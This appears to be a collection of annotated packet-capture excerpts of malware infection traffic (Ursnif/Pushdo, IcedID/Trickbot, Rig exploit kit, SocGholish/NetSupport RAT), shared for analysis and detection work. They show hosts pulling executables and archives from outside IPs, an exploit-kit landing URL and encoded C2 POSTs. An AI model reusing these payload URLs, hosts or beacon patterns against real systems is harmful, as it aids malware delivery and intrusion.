Text Example

Ursnif and Pushdo Trojan DDoS Botnet Malware Infection PCAP file download traffic sample

2019-07-29 12:48:13.981152 IP 10.7.29.101.49158 > 185.244.213.113.443: Flags [P.], seq 1:118, ack 1, win 64240, length 117
2019-07-29 12:48:13.981273 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [.], ack 118, win 64240, length 0
2019-07-29 12:48:14.192305 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [P.], seq 1:1383, ack 118, win 64240, length 1382
... > 10.7.29.101.49158: Flags [.], seq 1383:2843, ack 118, win 64240, length 1460

2019-07-29 12:52:10.719361 IP 10.7.29.101.49161 > 40.76.4.15.80: Flags [P.], seq 1:458, ack 1, win 64240, length 457: HTTP: GET /images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi HTTP/1.1
GET /images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko/20100101 Firefox/12.0
Accept-Encoding: gzip, deflate
Host: microsoft.com
DNT: 1
Connection: Keep-Alive

2019-07-29 12:52:10.719447 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [.], ack 458, win 64240, length 0
2019-07-29 12:52:10.807321 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [P.], seq 1:325, ack 458, win 64240, length 324: HTTP: HTTP/1.1 301 Moved Permanently
HTTP/1.1 301 Moved Permanently
Date: Mon, 29 Jul 2019 16:52:10 GMT
Server: Kestrel
Content-Length: 0
Location: https://www.microsoft.com/images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi

2019-07-29 12:53:39.848186 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1:438, ack 1, win 64240, length 437: HTTP: GET /images/n4zofhavQgNnJWOdBQ0/nPKAARUazfT3JA1eP9tpCw/HdIhYDqCQpUHz/_2BSSI3R/phBSl6Ce_2Bs0W_2BD7POgC/GmZq5N6N1r/keTipeJU9vv_2BLiU/pOuusTuOjboG/UB_2BmP7hsa/w71kdYG5ZOIMUr/gCbHKq37/FZ3.avi HTTP/1.1
GET /images/n4zofhavQgNnJWOdBQ0/nPKAARUazfT3JA1eP9tpCw/HdIhYDqCQpUHz/_2BSSI3R/phBSl6Ce_2Bs0W_2BD7POgC/GmZq5N6N1r/keTipeJU9vv_2BLiU/pOuusTuOjboG/UB_2BmP7hsa/w71kdYG5ZOIMUr/gCbHKq37/FZ3.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:39.848277 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 438, win 64240, length 0
2019-07-29 12:53:40.046606 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [P.], seq 1:1383, ack 438, win 64240, length 1382: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:14 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=i52pvsrt089bi7i3umb88bd400; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:14 GMT; path=/; domain=.irwhfgowe.xyz
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

2019-07-29 12:53:40.046704 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [.], ack 1383, win 62858, length 0
2019-07-29 12:53:40.048505 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 1383:2843, ack 438, win 64240, length 1460: HTTP
2019-07-29 12:53:40.048521 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 2843:4303, ack 438, win 64240, length 1460: HTTP

2019-07-29 12:53:43.474193 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1076:1511, ack 500659, win 64240, length 435: HTTP: GET /images/_2B4OwFC/6vjfFP_2B9uEz70SydULkkQ/V6jakRAWYD/AOLjnZYCVGOTKqeQQ/jEaRE2qFGZsu/lTmxprbzXB2/42A_2FkdM3tNun/gLYbeGst8_2BWnKGu7mGT/ZW8gMjxsJDmd0ZZG/9PzwD2p8rTJNi6b/XP71k6bvIt/7.avi HTTP/1.1
GET /images/_2B4OwFC/6vjfFP_2B9uEz70SydULkkQ/V6jakRAWYD/AOLjnZYCVGOTKqeQQ/jEaRE2qFGZsu/lTmxprbzXB2/42A_2FkdM3tNun/gLYbeGst8_2BWnKGu7mGT/ZW8gMjxsJDmd0ZZG/9PzwD2p8rTJNi6b/XP71k6bvIt/7.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:43.474326 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 1511, win 64240, length 0
2019-07-29 12:53:43.681682 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 500659:502119, ack 1511, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:17 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=nthmmr62j6fsaf2hggojf13s20; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:17 GMT; path=/; domain=.irwhfgowe.xyz
Content-Length: 2480
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2019-07-29 12:53:43.681709 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 502119:503579, ack 1511, win 64240, length 1460: HTTP

2019-07-29 13:00:51.068034 IP 10.7.29.101.49247 > 109.123.223.76.80: Flags [P.], seq 1:179, ack 1, win 64240, length 178: HTTP: GET /demo/PhotoA.rar HTTP/1.1
GET /demo/PhotoA.rar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: kacafirek.cz
Connection: Keep-Alive
Cache-Control: no-cache

2019-07-29 13:00:51.068133 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], ack 179, win 64240, length 0
2019-07-29 13:00:51.258107 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], seq 1:1461, ack 179, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Mon, 29 Jul 2019 17:00:51 GMT
Server: Apache
Last-Modified: Mon, 29 Jul 2019 08:06:23 GMT
ETag: "e60124-3eea3-58ecd5e2cfdc0"
Accept-Ranges: bytes
Content-Length: 257699
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-rar-compressed

2019-07-29 13:00:58.982371 IP 10.7.29.101.53764 > 172.16.5.2.53: 23168+ A? www.vitaindu.com. (34)
2019-07-29 13:00:58.982627 IP 10.7.29.101.63732 > 172.16.5.2.53: 20475+ A? www.pr-park.com. (33)
2019-07-29 13:00:58.982894 IP 10.7.29.101.65154 > 172.16.5.2.53: 28480+ A? www.2print.com. (32)
2019-07-29 13:00:58.984127 IP 10.7.29.101.54427 > 172.16.5.2.53: 60399+ A? www.crcsi.org. (31)
2019-07-29 13:00:58.987089 IP 10.7.29.101.49386 > 172.16.5.2.53: 17994+ A? www.spanesi.com. (33)
2019-07-29 13:00:58.987781 IP 10.7.29.101.58486 > 172.16.5.2.53: 43542+ A? www.owsports.ca. (33)
2019-07-29 13:00:58.989882 IP 10.7.29.101.54356 > 172.16.5.2.53: 39383+ A? www.rs-ag.com. (31)
2019-07-29 13:00:58.991007 IP 10.7.29.101.60036 > 172.16.5.2.53: 34096+ A? www.c9dd.com. (30)
2019-07-29 13:00:58.992556 IP 10.7.29.101.53486 > 172.16.5.2.53: 64159+ A? www.udesign.biz. (33)
2019-07-29 13:00:58.993571 IP 10.7.29.101.57888 > 172.16.5.2.53: 32553+ A? wpad.localdomain. (34)
2019-07-29 13:00:59.054760 IP 172.16.5.2.53 > 10.7.29.101.58486: 43542 2/0/0 A 198.105.254.64, A 198.105.244.64 (65)
2019-07-29 13:00:59.058581 IP 10.7.29.101.49248 > 198.105.254.64.80: Flags [S], seq 1756324796, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-29 13:00:59.059556 IP 172.16.5.2.53 > 10.7.29.101.53486: 64159 2/0/0 A 198.105.254.64, A 198.105.244.64 (65)
2019-07-29 13:00:59.060024 IP 10.7.29.101.49249 > 198.105.254.64.80: Flags [S], seq 331088107, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-29 13:00:59.070348 IP 172.16.5.2.53 > 10.7.29.101.49386: 17994 2/2/4 A 104.26.2.86, A 104.26.3.86 (204)
2019-07-29 13:00:59.070711 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [S], seq 4069494565, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-29 13:00:59.083033 IP 172.16.5.2.53 > 10.7.29.101.54356: 39383 2/2/4 A 104.31.73.201, A 104.31.72.201 (203)
2019-07-29 13:00:59.083341 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [S], seq 4209286921, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-29 13:00:59.092781 IP 172.16.5.2.53 > 10.7.29.101.60036: 34096 2/2/4 A 104.25.152.27, A 104.25.153.27 (202)
2019-07-29 13:00:59.093130 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [S], seq 2628897602, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-29 13:00:59.124030 IP 172.16.5.2.53 > 10.7.29.101.54427: 60399 2/2/4 CNAME crcsi.org., A 198.12.145.135 (204)
2019-07-29 13:00:59.124420 IP 10.7.29.101.49253 > 198.12.145.135.80: Flags [S], seq 3693053252, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-29 13:00:59.134787 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [S.], seq 1144726242, ack 4069494566, win 64240, options [mss 1460], length 0
2019-07-29 13:00:59.134962 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [.], ack 1, win 64240, length 0
2019-07-29 13:00:59.135089 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [P.], seq 1:771, ack 1, win 64240, length 770: HTTP: POST / HTTP/1.1
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.spanesi.com
Cache-Control: no-cache

2019-07-29 13:00:59.135140 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [.], ack 771, win 64240, length 0
2019-07-29 13:00:59.153346 IP 172.16.5.2.53 > 10.7.29.101.65154: 28480 2/2/4 CNAME 2print.com., A 184.168.221.53 (202)
2019-07-29 13:00:59.153873 IP 10.7.29.101.49254 > 184.168.221.53.80: Flags [S], seq 1193526277, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-29 13:00:59.155302 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [S.], seq 355223488, ack 4209286922, win 64240, options [mss 1460], length 0
2019-07-29 13:00:59.155392 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [.], ack 1, win 64240, length 0
2019-07-29 13:00:59.155532 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [P.], seq 1:773, ack 1, win 64240, length 772: HTTP: POST / HTTP/1.1
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 540
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.rs-ag.com
Cache-Control: no-cache

2019-07-29 13:00:59.155592 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [.], ack 773, win 64240, length 0
2019-07-29 13:00:59.171901 IP 104.25.152.27.80 > 10.7.29.101.49252: Flags [S.], seq 924723558, ack 2628897603, win 64240, options [mss 1460], length 0
2019-07-29 13:00:59.172132 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [.], ack 1, win 64240, length 0
2019-07-29 13:00:59.172470 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [P.], seq 1:768, ack 1, win 64240, length 767: HTTP: POST / HTTP/1.1
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.c9dd.com
Cache-Control: no-cache

2019-07-29 13:00:59.687314 IP 10.7.29.101.52012 > 172.16.5.2.53: 33479+ A? www.vazir.se. (30)
2019-07-29 13:00:59.699312 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [S.], seq 687621463, ack 3876635042, win 64240, options [mss 1460], length 0
2019-07-29 13:00:59.699454 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [.], ack 1, win 64240, length 0
2019-07-29 13:00:59.699544 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [P.], seq 1:756, ack 1, win 64240, length 755: HTTP: POST / HTTP/1.1
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 520
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.vitaindu.com
Cache-Control: no-cache

2019-07-29 13:00:59.699603 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [.], ack 756, win 64240, length 0
2019-07-29 13:00:59.782318 IP 172.16.5.2.53 > 10.7.29.101.58389: 12756 1/2/2 A 210.140.73.39 (142)
2019-07-29 13:00:59.783153 IP 10.7.29.101.49262 > 210.140.73.39.80: Flags [S], seq 3843601751, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-29 13:00:59.819475 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 13821:15203, ack 811, win 64240, length 1382: HTTP
2019-07-29 13:00:59.819587 IP 10.7.29.101.49255 > 157.7.107.91.80: Flags [.], ack 15203, win 62858, length 0
2019-07-29 13:00:59.820412 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 15203:16585, ack 811, win 64240, length 1382: HTTP

IcedID Iced ID and Trickbot Banking Malware Trojan Downloader Dropper PCAP file download traffic sample

2019-08-12 14:04:16.655885 IP 10.8.12.101.49224 > 179.60.144.143.443: Flags [P.], seq 1:119, ack 1, win 64240, length 118
2019-08-12 14:04:16.655968 IP 179.60.144.143.443 > 10.8.12.101.49224: Flags [.], ack 119, win 64240, length 0
2019-08-12 14:04:16.841099 IP 179.60.144.143.443 > 10.8.12.101.49224: Flags [P.], seq 1:810, ack 119, win 64240, length 809

2019-08-12 14:04:22.653444 IP 10.8.12.101.49226 > 107.173.90.141.80: Flags [P.], seq 1:79, ack 1, win 64240, length 78: HTTP: GET /SWKLPFVBDS.exe HTTP/1.1
GET /SWKLPFVBDS.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.653480 IP 107.173.90.141.80 > 10.8.12.101.49226: Flags [.], ack 79, win 64240, length 0
2019-08-12 14:04:22.653825 IP 107.173.90.141.80 > 10.8.12.101.49227: Flags [S.], seq 1652259580, ack 1389350972, win 64240, options [mss 1460], length 0
2019-08-12 14:04:22.653923 IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
... > 107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin64.exe HTTP/1.1
GET /Tin64.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.654025 IP 107.173.90.141.80 > 10.8.12.101.49227: Flags [.], ack 74, win 64240, length 0
2019-08-12 14:04:22.658025 IP 107.173.90.141.80 > 10.8.12.101.49228: Flags [S.], seq 848954188, ack 3386416125, win 64240, options [mss 1460], length 0
2019-08-12 14:04:22.658306 IP 10.8.12.101.49228 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
2019-08-12 14:04:22.658387 IP 10.8.12.101.49228 > 107.173.90.141.80: Flags [P.], seq 1:72, ack 1, win 64240, length 71: HTTP: GET /tin.exe HTTP/1.1
GET /tin.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.658419 IP 107.173.90.141.80 > 10.8.12.101.49228: Flags [.], ack 72, win 64240, length 0
2019-08-12 14:04:22.658818 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [S.], seq 2043162382, ack 4219249562, win 64240, options [mss 1460], length 0
2019-08-12 14:04:22.658925 IP 10.8.12.101.49229 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
2019-08-12 14:04:22.659036 IP 10.8.12.101.49229 > 107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin86.exe HTTP/1.1
GET /Tin86.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.783970 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [.], seq 21901:23361, ack 74, win 64240, length 1460: HTTP
2019-08-12 14:04:22.783982 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [.], seq 23361:24821, ack 74, win 64240, length 1460: HTTP
2019-08-12 14:04:22.783983 IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [.], ack 32121, win 64240, length 0
2019-08-12 14:04:22.783993 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [P.], seq 24821:26281, ack 74, win 64240, length 1460: HTTP

2019-08-12 14:14:56.835089 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [P.], seq 4809:6269, ack 1931, win 65535, length 1460
2019-08-12 14:14:56.835150 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [.], ack 6269, win 64240, length 0
2019-08-12 14:14:56.835172 IP 10.8.12.2.60172 > 185.70.40.151.443: Flags [.], ack 6825, win 65535, length 0
2019-08-12 14:14:56.835251 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [P.], seq 6269:6896, ack 1931, win 65535, length 627
2019-08-12 14:14:56.835276 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [.], ack 6896, win 64240, length 0
2019-08-12 14:14:57.185963 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [FP.], seq 1931, ack 6896, win 64240, length 0
2019-08-12 14:14:57.186113 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [.], ack 1932, win 65535, length 0
2019-08-12 14:14:57.186214 IP 10.8.12.2.60172 > 185.70.40.151.443: Flags [F.], seq 1905, ack 6825, win 65535, length 0
E..(:.@…..
….F(……:ka. 4=P…vB..
2019-08-12 14:14:57.186317 IP 185.70.40.151.443 > 10.8.12.2.60172: Flags [.], ack 1906, win 64239, length 0
E..(;……..F(.
…….. 4=.:kbP…{R..
2019-08-12 14:14:57.331011 IP 185.183.96.213.443 > 10.8.12.2.59830: Flags [P.], seq 782:827, ack 80, win 64240, length 45
E..U;……1...
.........9Q5...P..............%....18FC78E29C1478DA645838C4DD2B2195.
2019-08-12 14:14:57.331471 IP 10.8.12.2.60174 > 185.183.96.213.443: Flags [S], seq 1476129128, win 65535, options [mss 1460,nop,wscale 4,nop,nop,sackOK], length 0
E..4:.@....9
.....…..W..h………P…………..

Rig Exploit Kit EK Loads MedusaHTTP Malware Trojan Backdoor Flash Exploit PCAP File Download Traffic Sample

2019-08-12 16:57:48.518525 IP 10.8.12.101.49158 > 188.225.37.115.80: Flags [P.], seq 1:737, ack 1, win 64240, length 736: HTTP: GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
E….H@…..
..e..%s…P..R’….P…!…GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 188.225.37.115
Connection: Keep-Alive

2019-08-12 16:57:48.518651 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [.], ack 737, win 64240, length 0
E..(.a….^…%s
..e.P……..U.P…. ..
2019-08-12 16:57:49.127786 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [P.], seq 1:1277, ack 737, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
E..$.b….Y…%s
..e.P……..U.P…cL..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 12 Aug 2019 20:57:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 45973
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

2019-08-12 16:59:38.271526 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 1:269, ack 1, win 64240, length 268: HTTP: POST /forums/members/api.jsp HTTP/1.1
E..4..@…..
..e.w…..P.R.az.e.P….%..POST /forums/members/api.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Host: cdnshop78.world
Content-Length: 192
Expect: 100-continue
Connection: Keep-Alive

2019-08-12 16:59:38.271686 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 269, win 64240, length 0
E..(.b….o{.w..
..e.P..z.e..R.mP….O..
2019-08-12 16:59:38.626952 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 269:461, ack 1, win 64240, length 192: HTTP
E…..@….B
..e.w…..P.R.mz.e.P…….xyz=Jn72I3lUOoD6/K%2BBOVBU21CCWaMR0pT/MMMybhkcYzKf0Fxhd5iX/gM81s2/ry7/68WwIwZcdWQ6itJCp/2EjmcHZrxDMiwaQmK6aOtIdjcivuIb26kGZv0gTBGSgrc2LVstLUlWLVstMl4VcmXCxtXRM%2Bb999Q62gnpsw9gRcO404kDv36jb7g=
2019-08-12 16:59:38.627077 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 461, win 64240, length 0
E..(.c….oz.w..
..e.P..z.e..R.-P…….
2019-08-12 16:59:38.701682 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 1:26, ack 461, win 64240, length 25: HTTP: HTTP/1.1 100 Continue
E..A.d….o`.w..
..e.P..z.e..R.-P…N[..HTTP/1.1 100 Continue

2019-08-12 16:59:38.807386 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [.], ack 26, win 64215, length 0
E..(..@…..
..e.w…..P.R.-z.f.P…….
2019-08-12 16:59:39.444787 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 26:381, ack 461, win 64240, length 355: HTTP: HTTP/1.1 404 Not Found
E….f….n..w..
..e.P..z.f..R.-P…)m..HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 13 Aug 2019 00:59:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.39

2019-08-12 18:02:50.728872 IP 10.8.12.101.49205 > 195.22.26.248.80: Flags [P.], seq 246:434, ack 26, win 64215, length 188: HTTP
E….j@…./
..e…..5.P!p…)iiP…….xyz=Rdbf7Sz9YfcZXmTqimFyqnuXh9Qh2EokgRxWjlW6eKlVYMP/0Ie66coOHRDqh72wYWFpR4xyzrqwauM0ArlQyO1qB/flAxIl7E5s3wAGYyWQvmPGYIc2JkmQEzK0NIxSLVstLUlWLVst5B2FNeT80ZFfKTucqMUWcv06uvZYrUmVLNhFF/hGmbs=
2019-08-12 18:02:50.729083 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [.], ack 434, win 64240, length 0
E..(……K_….
..e.P.5.)ii!p.aP….~..
2019-08-12 18:02:50.900794 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [FP.], seq 26:283, ack 434, win 64240, length 257: HTTP: HTTP/1.1 200 OK
E..)……J]….
..e.P.5.)ii!p.aP….F..HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Aug 2019 22:02:47 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=98d119f0da644d3d3e6a3eec09296b9b|173.166.146.112|1565647367|1565647367|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT

Google Chrome FAKE Download Update Malware SocGholish campaign loads NetSupport RAT PCAP File Download Traffic Sample

2019-08-26 15:03:01.209093 IP 10.8.26.101.51807 > 10.8.26.1.53: 44756+ A? mysocalledchaos.com. (37)
E..A.O……
..e
…._.5.-……………mysocalledchaos.com…..

2019-08-26 15:03:01.353045 IP 10.8.26.101.49163 > 166.62.111.64.80: Flags [P.], seq 1:409, ack 1, win 256, length 408: HTTP: GET / HTTP/1.1
E….d@…..
..e.>o@…P.9…C.&P…….GET / HTTP/1.1
Host: mysocalledchaos.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en

2019-08-26 15:03:39.075406 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 17917:19120, ack 14190, win 451, length 1203: HTTP
E…….1.[S….
..e.P.>..Y,n.?xP…0…783dd8ca1563a9aa539aeb4137359091b485d367b384986c694f6d23061f3cb4dcbc61373d9f6e6b7a2d195873694c3dd98a63e44b3cb5dcd935a1d2d3f2d485d2e6a784996c3226759f9aa0c34b2c9c61373011859485c2724193dffb5b8d1c87251f3cb4d4b39ec8c260b19485d5a7b384997c993f9d26f23969e04a5b21673590919b7a2d1957a499653ccd8a60253a0a223acaa76735b0919e84c6e6a7c41d3bba9fdc8623097c94fcbc61373ed18594859282e173cf4afb899a4065537da0dcbc217303664694b5f2e6a784942d29d98a20e1686b93faea8700a5d0b19485d2e82690996c6d6cbce6927879839b9af7d14a60b19b44c6e6a6c40c682b3ebcf453d92b97ddb86137159091948493c2a785d9f938af1c263169baa3f87d653735b0919485d0278384995cb9fe1d263179ca421cbc61373d9f6e6b722067838499385bcf4d56351a7b938aec0400a2a7d7c255f2e6a245bd6c3de90f16927978922a4aa1173590999b7a2d115205bd6c3d8dec76a2696cf19b9b376750a706a3c38436878491ad19d98a50e199ca52a89a97c1f5d091948ddd19587361ed19d98a3403